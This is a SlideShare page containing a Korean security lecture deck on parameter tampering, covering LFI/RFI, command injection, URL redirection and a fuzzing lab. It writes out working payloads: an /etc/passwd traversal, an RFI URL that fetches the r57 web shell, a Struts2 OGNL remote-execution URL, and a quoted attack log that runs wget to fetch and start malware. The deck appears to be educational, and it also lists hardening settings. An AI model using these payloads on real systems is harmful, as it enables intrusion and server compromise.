Upload
Download free for 30 days
Login
Submit Search
parameter tampering
0 likes
1,527 views
I
Ilsun Choi
parameter tampering
Technology
Read more
1 of 49
Download now
Downloaded 17 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
More Related Content
PPTX
Error Expose
Ilsun Choi
ย
PPTX
Exposure Information
Ilsun Choi
ย
PDF
05 pe ํค๋(pe header)
Ilsun Choi
ย
PDF
Log parser&webshell detection
Ilsun Choi
ย
PDF
Directory lists
Ilsun Choi
ย
PPTX
05 pe ํค๋(pe header)
Ilsun Choi
ย
PDF
comparing Shell dectector and NeoPI
Ilsun Choi
ย
PPTX
Google Hacking
Ilsun Choi
ย
Error Expose
Ilsun Choi
ย
Exposure Information
Ilsun Choi
ย
05 pe ํค๋(pe header)
Ilsun Choi
ย
Log parser&webshell detection
Ilsun Choi
ย
Directory lists
Ilsun Choi
ย
05 pe ํค๋(pe header)
Ilsun Choi
ย
comparing Shell dectector and NeoPI
Ilsun Choi
ย
Google Hacking
Ilsun Choi
ย
Viewers also liked
(20)
PDF
Le piattaforme per il social business
piero itta
ย
PDF
Prezi #hotelvertrieb#ecommerce#SEO_2021
Ansgar Jahns
ย
PDF
M Power
Chris Direduryan
ย
PDF
PHP
andreluizlc
ย
PDF
Domanda protocollata
noicattaroweb
ย
PDF
Cyberfolio 2007 - Lean.Joy
Leandro Rangel
ย
PDF
PHP SuperGlobals - Supersized Trouble
Imperva
ย
PPTX
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
Jacqueline Vickery
ย
PPTX
La posta elettronica certificata (PEC)
Salvatore Cordiano
ย
PPTX
Sunny on Foody
mrp4
ย
PPTX
Formazione formatori
stefano preto
ย
PDF
Quick Wins
HighLoad2009
ย
PPT
Intestazione
rifugiati
ย
PDF
Wordpress Security Optimization (Basic)
Irvan R-ID
ย
PPT
L1 seeingthings
Boat Dock
ย
PDF
Digital Media & Youth Safety - Ricky Lewis & Jacqueline Vickery
Jacqueline Vickery
ย
PPT
O meio ambiente acustico.97
Priscila Silveira Prado
ย
PPT
Thanks A Lot
Karen C
ย
PPTX
A+ student strategies final
Northeast Center, Office of Academic Support, SUNY Empire State College
ย
PDF
Sharding Architectures
guest0e6d5e
ย
Le piattaforme per il social business
piero itta
ย
Prezi #hotelvertrieb#ecommerce#SEO_2021
Ansgar Jahns
ย
M Power
Chris Direduryan
ย
PHP
andreluizlc
ย
Domanda protocollata
noicattaroweb
ย
Cyberfolio 2007 - Lean.Joy
Leandro Rangel
ย
PHP SuperGlobals - Supersized Trouble
Imperva
ย
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
Jacqueline Vickery
ย
La posta elettronica certificata (PEC)
Salvatore Cordiano
ย
Sunny on Foody
mrp4
ย
Formazione formatori
stefano preto
ย
Quick Wins
HighLoad2009
ย
Intestazione
rifugiati
ย
Wordpress Security Optimization (Basic)
Irvan R-ID
ย
L1 seeingthings
Boat Dock
ย
Digital Media & Youth Safety - Ricky Lewis & Jacqueline Vickery
Jacqueline Vickery
ย
O meio ambiente acustico.97
Priscila Silveira Prado
ย
Thanks A Lot
Karen C
ย
A+ student strategies final
Northeast Center, Office of Academic Support, SUNY Empire State College
ย
Sharding Architectures
guest0e6d5e
ย
Ad
Similar to parameter tampering
(20)
PDF
bofแแ ตแแ ฉ+rtl+fake_ebp
one_two_12
ย
PDF
(130511) #fitalk utilization of ioc, ioaf and sig base
INSIGHT FORENSIC
ย
PPTX
[Devfest Campus Korea 2021]๋ณด์๊ณผ ํจ๊ป ํ๋ ๊ฐ๋ฐ, ์ํ์ด์ฝ๋ฉ
GDGCampusKorea
ย
PDF
(Ficon2016) #2 ์นจํด์ฌ๊ณ ๋์, ์ด๋ ๋ค๊ณ ์ ํด๋ผ
INSIGHT FORENSIC
ย
PDF
แแ ณแฏแ แ กแแ ฎแแ ณ ํ๋ ์ด 101
Jinseok Oh
ย
PDF
[์ปจํธ๋ฆฌ๋ทฐํค 2020] ๋ฆฌ๋ธ๋ ์คํผ์ค(LibreOffice)์ QA ๋ฐ ์์ค ์ฝ๋ ๋ฆฌ๋ทฐ
DaeHyun Sung
ย
PDF
UNIX ์์คํ 2014-2018๋ ๊ธฐ๋ง์ํ ๊ธฐ์ถ๋ฌธ์
Lee Sang-Ho
ย
PPTX
XECon2015 :: [2-1] ์ ๊ด์ญ - ์ฒ์ ์์ํ๋ laravel
XpressEngine
ย
PPTX
์ฒ์ ์์ํ๋ ๋ผ๋ผ๋ฒจ
KwangSeob Jeong
ย
PDF
Nodejs๋ฅผ ์ด์ฉํ ๊ฐ๋ฐ
WebFrameworks
ย
PDF
[แแ กแฏแแ ญแแ กแ แ ญ] AWS แแ ณแฏแ แ กแแ ฎแแ ณ แแ ตแซแแ ณแ แ ก BDFDoor แแ ขแแ ณแผ แแ กแผแแ กแซ.pdf
ssuserf8b8bd1
ย
PDF
[2014 CodeEngn Conference 10] ์ฌ์ค๋ณด - ๊ธ์ ์ด ํ์ํฉ๋๋ค
Code Engn
ย
PDF
[232] แแ ฅแผแแ ณแผแแ ฅแแ ตแแ กแแ ตแแ ฑแแ ฅแแ กแแ ชแปแแ ต แแ ฉแผแแ ขแแ ฎแผ
NAVER D2
ย
PDF
ํด์ปค๊ฐ ๋๊ณ ์ถ์ ์๋ ๋์๊ฒ... ์ ๋ณด๋ณด์ ์ ๋ฌธ๊ณผ ๊ธธ ์ฐพ๊ธฐ
J J
ย
PDF
XECon2015 :: [1-1] ์์ ์ - XE3 ๊ตฌ์กฐ ๋ฐ ๊ธฐ๋ณธ๊ธฐ
XpressEngine
ย
PPTX
Python study 1๊ฐ (์คํ์์ค์ปจ์คํ ๋ด๋ถ ๊ฐ์)
์ ๋ช ํ Jerry Jeong
ย
PDF
Postman๊ณผ Newman์ ์ด์ฉํ RestAPI ํ ์คํธ ์๋ํ ๊ฐ์ด๋
SangIn Choung
ย
PDF
แแ ตแแ ณแผแแ งแผแแ ตแแ ฉแจแแ ฑแแ งแธแแ ฉแผแแ งแจ แแ ฌแแ ตแซแแ ฉแผแแ ฃแผ แแ ฎแซแแ ฅแจ
ํ์ต ์ฃผ
ย
PDF
Hoons๋ท๋ท ์ข์ถฉ์ฐ๋ 10๋ , ๊ทธ๋ฆฌ๊ณ ์๋ก์ด ํจ๋ฌ๋ค์
KH Park (๋ฐ๊ฒฝํ)
ย
PPTX
Google Protocol buffer
knight1128
ย
bofแแ ตแแ ฉ+rtl+fake_ebp
one_two_12
ย
(130511) #fitalk utilization of ioc, ioaf and sig base
INSIGHT FORENSIC
ย
[Devfest Campus Korea 2021]๋ณด์๊ณผ ํจ๊ป ํ๋ ๊ฐ๋ฐ, ์ํ์ด์ฝ๋ฉ
GDGCampusKorea
ย
(Ficon2016) #2 ์นจํด์ฌ๊ณ ๋์, ์ด๋ ๋ค๊ณ ์ ํด๋ผ
INSIGHT FORENSIC
ย
แแ ณแฏแ แ กแแ ฎแแ ณ ํ๋ ์ด 101
Jinseok Oh
ย
[์ปจํธ๋ฆฌ๋ทฐํค 2020] ๋ฆฌ๋ธ๋ ์คํผ์ค(LibreOffice)์ QA ๋ฐ ์์ค ์ฝ๋ ๋ฆฌ๋ทฐ
DaeHyun Sung
ย
UNIX ์์คํ 2014-2018๋ ๊ธฐ๋ง์ํ ๊ธฐ์ถ๋ฌธ์
Lee Sang-Ho
ย
XECon2015 :: [2-1] ์ ๊ด์ญ - ์ฒ์ ์์ํ๋ laravel
XpressEngine
ย
์ฒ์ ์์ํ๋ ๋ผ๋ผ๋ฒจ
KwangSeob Jeong
ย
Nodejs๋ฅผ ์ด์ฉํ ๊ฐ๋ฐ
WebFrameworks
ย
[แแ กแฏแแ ญแแ กแ แ ญ] AWS แแ ณแฏแ แ กแแ ฎแแ ณ แแ ตแซแแ ณแ แ ก BDFDoor แแ ขแแ ณแผ แแ กแผแแ กแซ.pdf
ssuserf8b8bd1
ย
[2014 CodeEngn Conference 10] ์ฌ์ค๋ณด - ๊ธ์ ์ด ํ์ํฉ๋๋ค
Code Engn
ย
[232] แแ ฅแผแแ ณแผแแ ฅแแ ตแแ กแแ ตแแ ฑแแ ฅแแ กแแ ชแปแแ ต แแ ฉแผแแ ขแแ ฎแผ
NAVER D2
ย
ํด์ปค๊ฐ ๋๊ณ ์ถ์ ์๋ ๋์๊ฒ... ์ ๋ณด๋ณด์ ์ ๋ฌธ๊ณผ ๊ธธ ์ฐพ๊ธฐ
J J
ย
XECon2015 :: [1-1] ์์ ์ - XE3 ๊ตฌ์กฐ ๋ฐ ๊ธฐ๋ณธ๊ธฐ
XpressEngine
ย
Python study 1๊ฐ (์คํ์์ค์ปจ์คํ ๋ด๋ถ ๊ฐ์)
์ ๋ช ํ Jerry Jeong
ย
Postman๊ณผ Newman์ ์ด์ฉํ RestAPI ํ ์คํธ ์๋ํ ๊ฐ์ด๋
SangIn Choung
ย
แแ ตแแ ณแผแแ งแผแแ ตแแ ฉแจแแ ฑแแ งแธแแ ฉแผแแ งแจ แแ ฌแแ ตแซแแ ฉแผแแ ฃแผ แแ ฎแซแแ ฅแจ
ํ์ต ์ฃผ
ย
Hoons๋ท๋ท ์ข์ถฉ์ฐ๋ 10๋ , ๊ทธ๋ฆฌ๊ณ ์๋ก์ด ํจ๋ฌ๋ค์
KH Park (๋ฐ๊ฒฝํ)
ย
Google Protocol buffer
knight1128
ย
Ad
parameter tampering
1.
ํ๋ผ๋ฏธํฐ ๋ณ์กฐ ์ทจ์ฝ์ 9์ฃผ์ฐจ
ํ๋ผ๋ฏธํฐ ๋ณ์กฐ ์ทจ์ฝ์ ์ต์ผ์ 1E-mail: isc0304@naver.com Writing by Ilsun Choi
2.
Index 1. ๊ฐ์ 2. ์ฌ๋ก๋ถ์ 1)
ํ์๊ฐ์ 2) ํ์ธ ๊ธ ์์ ๋ฐ ์ญ์ ํ๊ธฐ 3) ์๋ฐ์คํฌ๋ฆฝํธ๋ก ๊ตฌ์ฑ๋ ์์ /์ญ์ ํ์ด์ง ์ ๋ณด ๋ ธ์ถ 4) ํ์ผ ์ฝ์ (LFI/RFI) 5) ๋ช ๋ น์ด ์ฝ์ 6) URL Redirection 3. ๋ชจ์์ค์ต 1) ๋ช ๋ น์ด ์ฝ์ ์ทจ์ฝ์ ํ์ง 2) ๋ฒํผ์ค๋ฒํ๋ก์ฐ ์ ๊ฒ ๋ถ๋ก. Direct RET BOF 2E-mail: isc0304@naver.com Writing by Ilsun Choi
3.
1. ๊ฐ์ 3 ์ดํ๋ฆฌ์ผ์ด์ ์์ ์ฌ์ฉ๋๋ ์ ๋ณด ์ฌ์ฉ์
์ ๋ ฅํผ Query String HTTP ํค๋ ๊ธฐํ ๋ช ๋ น์ด ์ฝ์ ์๊ฒฉ์ง ํ์ผ ์ฝ์ ํ์ธ๊ธ ์์ /์ญ์ ๋ณ์กฐ E-mail: isc0304@naver.com Writing by Ilsun Choi
4.
2. ์ฌ๋ก๋ถ์ 1) ํ์๊ฐ์ 2)
ํ์ธ ๊ธ ์์ ๋ฐ ์ญ์ ํ๊ธฐ 3) ์๋ฐ์คํฌ๋ฆฝํธ๋ก ๊ตฌ์ฑ๋ ์์ /์ญ์ ํ์ด์ง ์ ๋ณด ๋ ธ์ถ 4) ํ์ผ ์ฝ์ (LFI/RFI) 5) ๋ช ๋ น์ด ์ฝ์ 6) URL Redirection 4E-mail: isc0304@naver.com Writing by Ilsun Choi
5.
2. ์ฌ๋ก๋ถ์ >
1) ํ์๊ฐ์ โข ์ ๋ ฅ ๊ฐ ๊ฒ์ฆ์ ์ํ ์๋ฐ์คํฌ๋ฆฝํธ โข ์๋ฐ์คํฌ๋ฆฝํธ์ ์ โข ๋น๊ณต๊ฐ test site๋ฅผ ์ฌ์ฉํ์ฌ ์ค์ตํ ๋ด์ฉ์ ์ ๋ฆฌํ์๋ค. 5 if ( a!= b ){ alert(โno hackโ); location.href = โ/โ; } E-mail: isc0304@naver.com Writing by Ilsun Choi
6.
2. ์ฌ๋ก๋ถ์ >
1) ํ์๊ฐ์ 1) ์ฃผ๋ฏผ๋ฑ๋ก๋ฒํธ ์ธ์ฆ ์ฐํ 6E-mail: isc0304@naver.com Writing by Ilsun Choi
7.
โข ์ฃผ๋ฏผ๋ฑ๋ก๋ฒํธ ์ฒดํฌ
๋ก์ง์ ์ฐพ์ ์ญ์ 2. ์ฌ๋ก๋ถ์ > 1) ํ์๊ฐ์ 7E-mail: isc0304@naver.com Writing by Ilsun Choi
8.
โข ์กด์ฌํ์ง ์๋
์ฃผ๋ฏผ๋ฑ๋ก๋ฒํธ๋ฅผ ๊ธฐ์ ํ์ฌ ์ฐํ์ ์ฑ๊ณต 2. ์ฌ๋ก๋ถ์ > 1) ํ์๊ฐ์ 8E-mail: isc0304@naver.com Writing by Ilsun Choi
9.
2. ์ฌ๋ก๋ถ์ >
1) ํ์๊ฐ์ โข ์ฃผ์์ฐพ๊ธฐ ์๋น์ค ์ฐํ โข ํ ์คํธ ์๋ฒ์ด๊ธฐ ๋๋ฌธ์ ์ฃผ์์ฐพ๊ธฐ ์๋น ์ค๊ฐ ์กด์ฌํ์ง ์๋๋ค. 9E-mail: isc0304@naver.com Writing by Ilsun Choi
10.
โข ์ฑ๊ณต์ ์ผ๋ก ํ์๊ฐ์ ์
์ฑ๊ณตํ ๊ฒ์ ๋ณผ ์ ์๋ค. 10 2. ์ฌ๋ก๋ถ์ > 1) ํ์๊ฐ์ E-mail: isc0304@naver.com Writing by Ilsun Choi
11.
2. ์ฌ๋ก๋ถ์ >
2) ํ์ธ ๊ธ ์์ ๋ฐ ์ญ์ 7.1.1 ํ์ธ ๋น๋ฐ ๊ธ ๋ณด๊ธฐ์ ์ ์ฌ ๋จผ์ ์ฐ๋ฆฌ๊ฐ ์ด์ฉํ ์ ์๋ ๊ฒ์๋ฌผ ์์ฑ 11E-mail: isc0304@naver.com Writing by Ilsun Choi
12.
โข ๋ด๊ฐ ์ด
๊ธ ์์ ํ์ด์ง ์ด๊ธฐ 12 2. ์ฌ๋ก๋ถ์ > 2) ํ์ธ ๊ธ ์์ ๋ฐ ์ญ์ E-mail: isc0304@naver.com Writing by Ilsun Choi
13.
โข ํ์ด์ง ์์ฒญ์์
18๋ฒ ๊ฒ ์๊ธ ๋ณ๊ฒฝ์ ์์ฒญํ๊ณ ์๋ค ๋ ๊ฒ์ ํ์ธ โข 15๋ฒ ๊ฒ์๊ธ์ ๋ฐ๊พธ๊ธฐ ์ ํด ๋ณ์กฐํ์ฌ ์งํ 13 2. ์ฌ๋ก๋ถ์ > 2) ํ์ธ ๊ธ ์์ ๋ฐ ์ญ์ E-mail: isc0304@naver.com Writing by Ilsun Choi
14.
โข ์์ ํ โข
์ญ์ ํ 14 2. ์ฌ๋ก๋ถ์ > ํ์ธ ๊ธ ์์ ๋ฐ ์ญ์ E-mail: isc0304@naver.com Writing by Ilsun Choi
15.
2. ์ฌ๋ก๋ถ์ >
3) ์๋ฐ์คํฌ๋ฆฝํธ, ์์ ์ญ์ ํ์ด์ง ๋ ธ์ถ 15 โข ์ญ์ ๊ฑฐ๋ ์์ ํ ์ ์๋ ํ์ด์ง๋ฅผ ์์ฒญํ๋ ํ์ โข javascript ๋ด์ ์์ /์ญ์ ํ์ด์ง ํ์ธ ๊ฐ๋ฅ E-mail: isc0304@naver.com Writing by Ilsun Choi
16.
2. ์ฌ๋ก๋ถ์ >
4) ํ์ผ์ฝ์ (LFI/RFI) โข RFI: Remote File Inclusion ์ธ๋ถ์ ์๋ ์๋ฒ๋ก๋ถํฐ ํ์ผ์ ์ฒจ๋ถ ๋ฐ์ -> ์ทจ์ฝํ ๋ก์ง(์น์๊ณผ ๊ฐ์)์ ๊ฐ์ ธ์ค๊ธฐ ์ํจ โข LFI: Local File Inclusion ์๋ฒ๋ด๋ถ๋ก๋ถํฐ ํ์ผ์ ์ฒจ๋ถ ๋ฐ์ -> ๋ฏผ๊ฐํ ๋ฐ์ดํฐ ๋ ธ์ถ(์์คํ ํ์ผ ๋ฑ)์ ์ํจ 16E-mail: isc0304@naver.com Writing by Ilsun Choi
17.
โข Default๋ Off โข
๊ฐ๋ฐ์์ ํ์์ ์ํด์ On์ด ๋ ์ ์์. 17E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์ฌ๋ก๋ถ์ > 4) ํ์ผ์ฝ์ (LFI/RFI)
18.
LFI ์ฌ๋ก 1 โข
ํ๋ผ๋ฏธํฐ ๊ฐ์ ์์คํ ํ์ผ ๋ฑ์ ๊ฒฝ๋ก๋ฅผ ์ฝ์ (๋ค์ด๋ก๋ ์ทจ์ฝ์ ๊ณผ ์ ์ฌ) โข ์๋์ ๊ฐ์ ํ์ฅ์๋ฅผ ๋ถ์ด๋ ํ์ ๏ ๋๋ฐ์ดํธ ์ธ์ ์ ์ ์ฌ์ฉ 18 ๊ตฌ๋ถ ํ๋ผ๋ฏธํฐ ์๋ณธ file=php(๋ด๋ถ์ ์ผ๋ก .abc๊ฐ ๋ถ์ด, php.abc๋ฅผ ํธ์ถ ๋ณ์กฐ file=../../../../../../etc/passwd%00 ๊ตฌ๋ถ ์ทจ์ฝํ ํจ์ php์ธ์ด require(),include(),eval(),passthru(),system(),fopen() ๋ฑ E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์ฌ๋ก๋ถ์ > 4) ํ์ผ์ฝ์ (LFI/RFI)
19.
LFI ์ฌ๋ก 2 โข
์ ๋ก๋ณด๋(xe)์ /include/write.php ์์ ๋ฐ์๋ LFI ์ทจ์ฝ์ โข โ://โ ์ โ..โ ๋ง์ ํํฐ๋งํ๊ธฐ ๋๋ฌธ์ ๋ค์๊ณผ ๊ฐ์ ๊ฒฝ๋ก๋ ์ฝ์ ๊ฐ๋ฅ c:windowssystem32driveretchosts 19E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์ฌ๋ก๋ถ์ > 4) ํ์ผ์ฝ์ (LFI/RFI)
20.
RFI ์ฌ๋ก 1 โข
์๊ฒฉ์ง์ ์๋ txtํ์ผ ๏ ์๋ฒ ๋ด๋ถ์์ php๋ก ์คํ 1. null.php ์คํ 2. include๋ก test.txt ํ์ผ ์ฝ๋๋ฅผ ๋ถ๋ฌ์ด 3. null.php๊ฐ ๋ถ๋ฌ์จ ์ฝ๋๋ฅผ ์คํ 20 ์คํ์์ 1. 2. 3. E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์ฌ๋ก๋ถ์ > 4) ํ์ผ์ฝ์ (LFI/RFI)
21.
โข ์ ์ฝ๋
์ฃผ์ โข http://www.r57shell.net/shell/r57.txt 21E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์ฌ๋ก๋ถ์ > 4) ํ์ผ์ฝ์ (LFI/RFI)
22.
โข http://192.168.157.130/9ch/null.php?file=http:// www.r57shell.net/shell/r57.txt %00 โข
์ด์ ์ฌ๋ก์ ๋์ผํ ๋ฐฉ์์ผ๋ก txt ํ์ผ์ ๋ถ๋ฌ๋ค ์ฌ ์คํํจ. 22E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์ฌ๋ก๋ถ์ > 4) ํ์ผ์ฝ์ (LFI/RFI)
23.
23 RFI ์ฌ๋ก 2 โข
โ://โ์ ํํฐ๋งํ์ฌ ์ฌ๋ก(1)๊ณผ ๊ฐ์ ์ทจ์ฝ์ ์ ๋ฐ์ํ์ง ์๋๋ค. โข ๊ทธ๋ฌ๋, base64๋ก ์ธ์ฝ๋ฉ๋ phpinfo()์ ์ฝ์ ํ๋ฉด php.ini ํ์ผ ์ ๋ณด๋ฅผ ํ์ธํ ์ ์๋ค. ๏ ์ถ๊ฐ์ ์ธ ์ทจ์ฝ์ ๋ ธ์ถ ๊ฐ๋ฅ์ฑ E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์ฌ๋ก๋ถ์ > 4) ํ์ผ์ฝ์ (LFI/RFI)
24.
โข http://192.168.157.130/9ch/null.php?file=data:;base64,PD9waHBpbmZvKCk/PiUwMA== โข ์ฝ์ ๋
base64 ์ฝ๋ : <?phpinfo()?>%00 24E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์ฌ๋ก๋ถ์ > 4) ํ์ผ์ฝ์ (LFI/RFI)
25.
25 โข ์ทจ์ฝํ ์
์๋ php.ini ์ค์ ๋ชฉ๋ก โป ์์ธํ ๋ด์ฉ์ ๊ต์ฌ p288 ํ์ธํ๋ฉด ๋๋ค. ์ค์ ์ ๋ณด ๊ถ์ฅ ๊ฐ ์ค์ ์ ๋ณด ๊ถ์ฅ ๊ฐ register_globals Off magic_quotes_sybase Off safe_mode On open_basedir ๋๋ ํฐ๋ฆฌ safe_mode_gid Off safe_mode_exec_dir ๋๋ ํฐ๋ฆฌ expose_php Off display_errors Off file_uploads Off log_errors On allow_url_fopen Off error_log ํ์ผ๋ช magic_quotes_gpc On E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์ฌ๋ก๋ถ์ > 4) ํ์ผ์ฝ์ (LFI/RFI)
26.
2. ์ฌ๋ก๋ถ์ >
5) ๋ช ๋ น์ด ์ฝ์ 1) PHP exec ํจ์ ๋ง๋ณด(Mambo) ์ดํ๋ฆฌ์ผ์ด์ ์ทจ์ฝ์ 26 mkidr E-mail: isc0304@naver.com Writing by Ilsun Choi
27.
2) open() ํจ์ AWStats
์ดํ๋ฆฌ์ผ์ด์ ์ awstats.pl ํ์ด์ง ์ทจ์ฝ์ ๊ณต๊ฒฉ ๋ก๊ทธ 1. id ๋ช ๋ น์ด๋ก ๊ณ์ ๊ถํ ํ์ธ 2. ์๊ฒฉ์ง ํ์ผ(aw.tgz)๋ฅผ ๊ฐ์ ธ์ ์ ์ฑํ๋ก๊ทธ๋จ ์คํ(inetd) 27 1 66.99.250.98 - - [24/Feb/2005:02:20:45 -0500] โGET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1โ404 1051 โ-โ โmozilla./4.0 (compatible; MSIE 6.0; Windows 98)โ 2 213.135.2.227 - - [26/Feb/2005:14:13:38 -0500] โGET /cgibin/awstats.pl? configdir=%20%7c%20cd%20%2ftmp%3bwget%20www.shady.go.ro%2faw.tgz%3b%20tar%20zx... HTTP1.1โ200 410 โ-โ โMozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)โ 2๋ฒ ๋ด์ฉ ๋์ฝ๋ฉ configdir= | cd /tmp; wget www.shandy.go.ro/aw.tgz; tar zxf aw.tgz; rm โf aw.tgz; cd aw; ./inetd | E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์ฌ๋ก๋ถ์ > 5) ๋ช ๋ น์ด ์ฝ์
28.
3) Apache Struts2(์๋ฐ
์น ์ดํ๋ฆฌ์ผ์ด์ ๊ฐ๋ฐ ํ๋ ์ ์ํฌ) ์๊ฒฉ ์ฝ๋ ์คํ โข http://seclists.org/fulldisclosure/2013/Oct/96 โข โaction:โ, โredirection:โ, redirectAction:โ๊ณผ ๊ฐ์ ํ๋ผ๋ฏธํฐ์ ํน์ ๊ตฌ๋ฌธ ์ ๋ฌ 28 http://vmbuild.apache.org/continuum/groupSummary.action?redirect:${%23a%3d(ne w%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d% 23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dne w%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),% 23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRespon se'),%23matr%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletR equest'),%23matt.getWriter().println(%23matr.getRealPath(%22/%22)),%23matt.getWri ter().flush(),%23matt.getWriter().close()} E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์ฌ๋ก๋ถ์ > 5) ๋ช ๋ น์ด ์ฝ์
29.
4) ASP ์
์ฝ๋ 5) PHP ์ ์ฝ๋ 29E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์ฌ๋ก๋ถ์ > 5) ๋ช ๋ น์ด ์ฝ์
30.
5) JSP ์
์ฝ๋ 30E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์ฌ๋ก๋ถ์ > 5) ๋ช ๋ น์ด ์ฝ์
31.
์ธ์ด๋ณ ์ทจ์ฝํ ํจ์
: ์๋ ํจ์ ์ฌ์ฉ์ ์ฃผ์๊ฐ ํ์ํจ 31 ๊ตฌ๋ถ ์ทจ์ฝํ ํจ์ PHP require(), include(), eval(), exec(), passthru(), system(), fopen ๋ฑ PERL open(), sysopen(), glob(), system() ๋ฑ JAVA system.* (system.runtime) ๋ฑ C system(), exec(), strcpy(), strcat(), sprint() ๋ฑ PYTHON exec(), eval(), execfile(), compile(), input() ๋ฑ E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์ฌ๋ก๋ถ์ > 5) ๋ช ๋ น์ด ์ฝ์
32.
โข ํ๋ผ๋ฏธํฐ๋ก ๋ฐ์
URL ์ฃผ์๋ก ํ์ด์ง ์ด๋ โข ํผ์ฑ ์ํ โข ํํ http://์ ๋ขฐํ ์์๋์ฌ์ดํธ/redirect.asp?target=http://malicious.com Phishing์ด๋? Private Data + fishing์ ํฉ์ฑ์ด ์ด๋ฉ์ผ ๋๋ ์คํธ ๋ฑ์ ๋ฐ์ก ๋ฐ ์ ์์๋ค์ ํน์ ์ฌ์ดํธ์ ๋์ผํ ๊ฐ์ง ์ฌ์ดํธ๋ก ์ ์ ๏ ์ฃผ๋ฏผ๋ฑ๋ก๋ฒํธ, ์ํ ๊ณ์ข ํน์ ์ ์ฉ์นด๋ ๋ฒํธ ํ์ทจ Phishing์ ์ ๋ 1996๋ AOL(American Online)์ ์ฌ์ฉํ๋ 10๋๋ค์ด ์ผ๋ฐ ์ฌ์ฉ์์๊ฒ ๊ฐ์ง ์ด๋ฉ์ผ์ ๋ณด๋ด๋ ํดํน ๊ธฐ ๋ฒ์ผ๋ก ์ ๋๋จ. 32E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์ฌ๋ก๋ถ์ > 5) ๋ช ๋ น์ด ์ฝ์
33.
โข ๋ณด์ ๋ด์ค
์ฐธ๊ณ ๊ธฐ์ฌ : http://www.boannews.com/media/view.asp?idx=45812 โข ์๋ ๋์์ ํด๋ฆญ ์ ํผ์ฑ ์๋ฒ๋ก ์ด๋ โข ํ์ด์ค๋ถ๊ณผ ๋๊ฐ์ด ์๊ธด UI๋ก ID/Password ์์ฒญ 33ํ์ด์ค๋ถ ๊ณ์ ํ์ทจ ๋ฐฉ๋ฒ ๊ฐ๋ ๋(์ถ์ฒ: ์ด์คํธ์ํํธ) โฒE-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์ฌ๋ก๋ถ์ > 6) URL Redirection
34.
3. ๋ชจ์์ค์ต 1) ๋ช ๋ น์ด
์ฝ์ ์ทจ์ฝ์ ํ์ง 2) ๋ฒํผ์ค๋ฒํ๋ก์ฐ ์ ๊ฒ 34E-mail: isc0304@naver.com Writing by Ilsun Choi
35.
3. ๋ชจ์์ค์ต >
1) ๋ช ๋ น์ด ์ฝ์ ์ทจ์ฝ์ ํ์ง โข ํ๋ผ๋ฏธํฐ ๋ค์ ๋ช ๋ น์ด ์ฝ์ ์ ๋ช ๋ น์ด๊ฐ ์คํ๋๋ ์ทจ์ฝ์ ์ ํ์งํ๋ค. โข ์ฝ์ ํจํด : &ipconfig โข ํ์ง ํจํด : 255.255.25 โข ์์ฑํ ํ์ง ํจํด 35E-mail: isc0304@naver.com Writing by Ilsun Choi
36.
โข ํ์ง ๊ฒฐ๊ณผ โข
์๋ฒ์์ netmask๋ฅผ 255.255.254๋ก ๋ฐ๊พผ ๊ฒ์ผ๋ก ๋ณด์ 36E-mail: isc0304@naver.com Writing by Ilsun Choi 3. ๋ชจ์์ค์ต > 1) ๋ช ๋ น์ด ์ฝ์ ์ทจ์ฝ์ ํ์ง
37.
http://cafe.naver.com/sec/13325 1. Savant โข BOF
์ทจ์ฝ์ ์ด ์กด์ฌํ๋ ์๋ฒ 2. Taof โข ์น ์๋ฒ fuzzer 3. ์์ฐ ๋์์ 37E-mail: isc0304@naver.com Writing by Ilsun Choi 3. ๋ชจ์์ค์ต > 2) ๋ฒํผ์ค๋ฒํ๋ก์ฐ ์ ๊ฒ
38.
โข ํ๋ก์ ์๋ฒ๋ฅผ
์์ฑํ์ฌ ์น๋ธ๋ผ์ฐ์ ๋ก ์ ์ ์ ์์ฒญ ํจํท์ ๊ธฐ๋ก 38E-mail: isc0304@naver.com Writing by Ilsun Choi 3. ๋ชจ์์ค์ต > 2) ๋ฒํผ์ค๋ฒํ๋ก์ฐ ์ ๊ฒ
39.
โข Fuzzing Points๋ฅผ
์ค์ ํ์ฌ Test ํ ๋ฌธ์์ด ๊ธธ์ด๋ฅผ ์ ํจ โข Savant ํ๋ก๊ทธ๋จ์ Attachํ์ฌ ๋น์ ์ ์ข ๋ฃ ์ ํ๋ก๊ทธ๋จ ๋คํ๋ฅผ ์ถ์ถ 39E-mail: isc0304@naver.com Writing by Ilsun Choi 3. ๋ชจ์์ค์ต > 2) ๋ฒํผ์ค๋ฒํ๋ก์ฐ ์ ๊ฒ
40.
โข ํ๋ก๊ทธ๋จ์ด ์ข ๋ฃ
